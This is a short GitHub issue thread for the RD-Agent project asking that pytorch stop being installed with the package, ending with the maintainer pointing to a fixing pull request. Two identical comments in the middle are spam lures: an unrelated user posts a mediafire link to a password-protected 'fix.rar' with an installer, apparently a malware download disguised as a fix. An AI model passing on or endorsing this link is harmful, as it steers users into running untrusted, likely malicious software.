### ISSUE TITLE
Stop installing pytorch when `pip install rdagent`

### ISSUE THREAD

**Issue by you-n-g** [microsoft/RD-Agent#225]
## 🌟 Feature Description

The resource-intensive environment needed to run the generated code should be integrated into Docker, rather than being part of rdagent itself.

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by you-n-g** [comment]
https://github.com/microsoft/RD-Agent/pull/241   is fixing the issue.
